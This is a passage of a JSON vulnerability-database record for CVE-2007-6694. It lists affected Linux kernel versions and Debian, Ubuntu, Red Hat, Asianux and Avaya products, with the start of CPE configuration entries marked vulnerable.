        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.35.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.14.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.33.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.69"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11_rc1_bk6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.9_pre5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.35"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86-64)"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "version"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (as)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (es)"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.30"
      },
      {
        "model": "linux ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.1"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33"
      },
      {
        "model": "kernel -pre2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.32"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel -test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.34.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.35.3"
      },
      {
        "model": "kernel -pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.34.5"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.30"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel 2.6.18-8.1.8.el5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "kernel -test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.332"
      },
      {
        "model": "communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.1"
      },
      {
        "model": "kernel -test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15-27.48"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.1"
      },
      {
        "model": "enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      },
      {
        "model": "kernel -ow2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.1"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.1"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.31"
      },
      {
        "model": "kernel -test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel -rc1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.37"
      },
      {
        "model": "kernel -test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel -pre9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel -test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.10"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.1"
      },
      {
        "model": "desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33.7"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1613"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.10"
      },
      {
        "model": "aes",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel -pre3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "messaging storage server mss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.10"
      },
      {
        "model": "kernel -test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1.1"
      },
      {
        "model": "kernel -test9-cvs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.34.6"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.1"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "linux lts lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel -test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -ow1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "message networking mn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.1"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.10"
      },
      {
        "model": "kernel -pre5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.10"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.1"
      },
      {
        "model": "intuity audix lx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.1"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.1"
      },
      {
        "model": "kernel pre7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel -test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1627"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel -test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.1"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.32"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel -pre2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.1"
      },
      {
        "model": "kernel -test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "27555"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-001057"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200801-420"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-6694"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:pre1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:pre4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.24:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.24_ow1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.28:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.30:rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.30:rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.33.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.33.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.35:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.35.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.9_pre5:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.15:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.16:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.23:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.24:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.30:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.31:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.38:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
